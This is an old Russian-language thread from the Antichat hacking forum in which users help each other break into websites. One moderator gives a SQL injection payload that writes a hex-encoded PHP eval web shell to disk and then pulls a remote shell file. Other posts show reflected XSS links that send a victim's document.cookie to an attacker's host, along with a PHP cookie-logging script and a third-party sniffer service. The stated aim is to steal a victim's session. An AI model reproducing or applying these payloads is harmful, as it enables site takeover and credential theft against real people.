Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.11.2009, 10:32
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
можно ли в joomla 1.0.15 залить шелл при условии, что компоненты ставить нельзя, php= safe mode? установленных бажных компонентов на первый взгляд нет, вход в админку имеется  |
|
|
21.11.2009, 10:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от B1t.exe
ElteRUS
ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Если file_priv = Y.
Найди полный путь.
Потому
То http://www.ru/vn84.php?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,0x3C3F206576616C28245F524 551554553545B635D293B203F3E,null,null+INTO+OUTFILE +'/полный/путь/inaex.php'--+
Далее если всё норм.
Нужно allow_url_fopen = on.
?с=copy($_GET[a], $_GET[b]);&a=http://site/shell.txt&b=inbex.php
(Да да inbex.php)
|
|
|
|
21.11.2009, 11:03
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы |
|
|
|
21.11.2009, 11:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от xofffff
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы Это должна быть не просто картинка, а PHP-скрипт, который записывает переданные ему данные куда - либо.
|
|
|
|
21.11.2009, 11:11
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от xofffff
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>
PHP код:
function cookie(){
window.location="cookie.php?data="+document.cookie;
}
в cookie.php
PHP код:
<?PHP
$file=fopen('cookie.txt', 'A+');
fwrite($file, $_GET['data']);
fclose($file);
?>
ps
Файл cookie.txt должны быть разрешены для записи.
|
|
|
|
21.11.2009, 11:13
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от DrAssault
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду  Ну да,скорее всего так и есть.
Но как подключиться к фтп на udp порту и какой синтаксис это команды?
NetCat ничего не выводит,хотя соединение не обрывает.
|
|
|
|
21.11.2009, 11:16
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от xofffff
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы
Я думаю тебе надо регатся на тут,нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=ТВОЙ ИД НОМЕР&"+document.cookie;</script>
потом куки найдеш тута наберив твой ид и пасс
|
|
|
|
21.11.2009, 11:19
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Сообщение от Ctacok
Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>
PHP код:
function cookie(){
window.location="cookie.php?data="+document.cookie;
}
в cookie.php
PHP код:
<?PHP
$file=fopen('cookie.txt', 'A+');
fwrite($file, $_GET['data']);
fclose($file);
?>
ps
Файл cookie.txt должны быть разрешены для записи. Сделал как ты сказал провери файл cookie.txt он пустой
посмотрел исходный код нашел место куда записался скрипт вот что там
PHP код:
<input type='text' maxlength='100' size='14' class='text' id='username' name='username' value='\'><script src=http://site.ru/js.js>cookie()</script> <'> <br><br>
|
|
|
|
21.11.2009, 11:23
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Сообщение от YuNi|[c
Я думаю тебе надо регатся на тут,нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:
потом куки найдеш тута наберив твой ид и пасс Сделал как ты сказал но поставился фильтр
Код:
<script>img=new Image(); img.src=\"http://web-defence.ru/snif/s.gif?id=850'>
тут если " идет то он перед ней ставит \
|
|
|
|
21.11.2009, 11:32
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Есть у кого еще какие нибудь предложения по самой простой теме
Я знаю вы поможете мне вы умные все ) Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif. Помогите реализовать мои коварные планы Добавление: Если в запросе писать " то перед " он ставит знак \ из за этого способ YuNi|[c не работает так как там код c "
Код:
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=850'><
Пробовал без " все равно лог не пришел не какой.
Способ от Ctacok'a сделал все как он сказал но в cookie.txt не что не сохранилось права стоят 777
Добавление:
Пробовал кодировать что бы обойти фильтр но лог так и не пришел
Последний раз редактировалось xofffff; 21.11.2009 в 11:39..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
